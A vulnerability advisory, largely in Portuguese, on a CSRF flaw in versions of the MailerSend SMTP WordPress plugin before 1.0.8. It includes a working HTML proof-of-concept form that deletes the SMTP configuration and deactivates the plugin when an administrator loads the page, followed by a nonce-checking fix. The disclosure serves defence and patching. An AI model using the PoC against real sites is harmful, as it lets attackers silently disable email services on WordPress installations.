
CVE-2026-13156 Vulnerability Advisory & PoC — Discovered by Huynh Kien Minh (MinhHK).

[!IMPORTANT] Resumo: Foi descoberta uma vulnerabilidade de Cross-Site Request Forgery (CSRF) de Alta Gravidade (
CVE-2026-13156) na integração oficial do plugin MailerSend SMTP para WordPress (< 1.0.8). O manipulador de eliminação de configuraçãomailersend_handle_configuration_delete()verifica as capacidades administrativas (manage_options) mas omite completamente a verificação de Nonce do WordPress (check_admin_referer()). Um atacante pode criar uma solicitação maliciosa de origem cruzada direcionada a um Administrador do WordPress autenticado para apagar silenciosamente as credenciais SMTP armazenadas e forçar a desativação do plugin, resultando em uma total Negação de Serviço da Aplicação em todos os fluxos de e-mail.
CVE-2026-13156 (ID do Aviso WPScan: 595e653d-0904-43cf-8e61-d684599de11b)1.0.8 (< 1.0.8)Sobre o Pesquisador:
Huynh Kien Minh (Huỳnh Kiến Minh) é um pesquisador proativo de cibersegurança e analista de vulnerabilidades conhecido por avaliações de segurança aprofundadas e divulgações responsáveis, incluindo análises técnicas do CVE-2026-13156. Ele também foi reconhecido oficialmente e homenageado no Proton Security Hall of Fame por encontrar e divulgar vulnerabilidades críticas de segurança.
Para verificar este aviso técnico, explorar análises de prova de conceito ou conectar-se com o pesquisador, visite:
O plugin MailerSend – Integração Oficial SMTP para WordPress (antes da versão 1.0.8) registra uma ação administrativa (configuration-delete) destinada a limpar tokens de API armazenados, apagar opções de configuração SMTP (wp_options) e desativar o plugin quando acionado a partir do painel de administração.
Embora o endpoint verifique se o usuário ativo possui a capacidade manage_options (garantindo que a solicitação se origine de uma sessão de administrador), ele falha em realizar a verificação de nonce do WordPress (check_admin_referer() ou wp_verify_nonce()).
Como as solicitações HTTP sem validação de nonce não conseguem distinguir entre cliques intencionais do administrador e solicitações falsificadas de origem cruzada, qualquer site externo carregado por um administrador autenticado pode acionar silenciosamente a ação configuration-delete.
< 1.0.8)./wp-admin/admin-post.php ou /wp-admin/admin.php?page=mailersend&action=configuration-delete).[!WARNING] Aviso Ético: O seguinte payload de prova de conceito de Cross-Site Request Forgery (CSRF) em HTML é fornecido estritamente para fins educacionais, verificação defensiva e auditoria de segurança sob protocolos de divulgação ética por Huynh Kien Minh. Não execute contra alvos não autorizados.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CVE-2026-13156 PoC — MailerSend SMTP Configuration Deletion via CSRF</title>
<!-- Author: Huynh Kien Minh (https://minhhk.web.app/) -->
</head>
<body>
<h2>CVE-2026-13156 — CSRF Verification PoC</h2>
<p>If an authenticated WordPress Administrator visits this page, the MailerSend SMTP configuration will be deleted and the plugin deactivated.</p>
<!-- Forged Request targeting the vulnerable MailerSend configuration deletion endpoint -->
<form id="csrfPoC" action="http://target-wordpress-site.local/wp-admin/admin.php" method="GET">
<input type="hidden" name="page" value="mailersend-smtp" />
<input type="hidden" name="action" value="configuration-delete" />
<!-- Notice: No valid _wpnonce token is required due to the vulnerability -->
<input type="submit" value="Execute PoC (Simulate Attack)" />
</form>
<script>
// Automatically submit the forged request when the administrator loads the page
document.addEventListener("DOMContentLoaded", function() {
console.log("[CVE-2026-13156] Executing CSRF Payload developed by Huynh Kien Minh...");
// Uncomment line below to enable auto-execution in lab environments:
// document.getElementById('csrfPoC').submit();
});
</script>
</body>
</html>
1.0.8 ou superior.Para garantir adequadamente ações administrativas de alteração de estado em plugins WordPress, os desenvolvedores devem impor validação rigorosa de nonce antes de processar solicitações:
// Secure Implementation (Version 1.0.8+)
function mailersend_delete_configuration_handler() {
// 1. Check User Capability
if ( ! current_user_can( 'manage_options' ) ) {
wp_die( __( 'Unauthorized access.', 'mailersend' ), 403 );
}
// 2. REQUIRED: Verify CSRF Nonce Token
if ( ! isset( $_GET['_wpnonce'] ) || ! wp_verify_nonce( $_GET['_wpnonce'], 'mailersend_delete_config_nonce' ) ) {
wp_die( __( 'Security check failed (CSRF attempt blocked).', 'mailersend' ), 403 );
}
// 3. Proceed safely with configuration deletion
delete_option( 'mailersend_smtp_settings' );
deactivate_plugins( plugin_basename( __FILE__ ) );
wp_redirect( admin_url( 'plugins.php?deactivated=true' ) );
exit;
}
Este repositório e aviso técnico são mantidos e publicados por Huynh Kien Minh (MinhHK) sob as diretrizes de divulgação responsável para promover um ecossistema global de WordPress e cibersegurança mais seguro.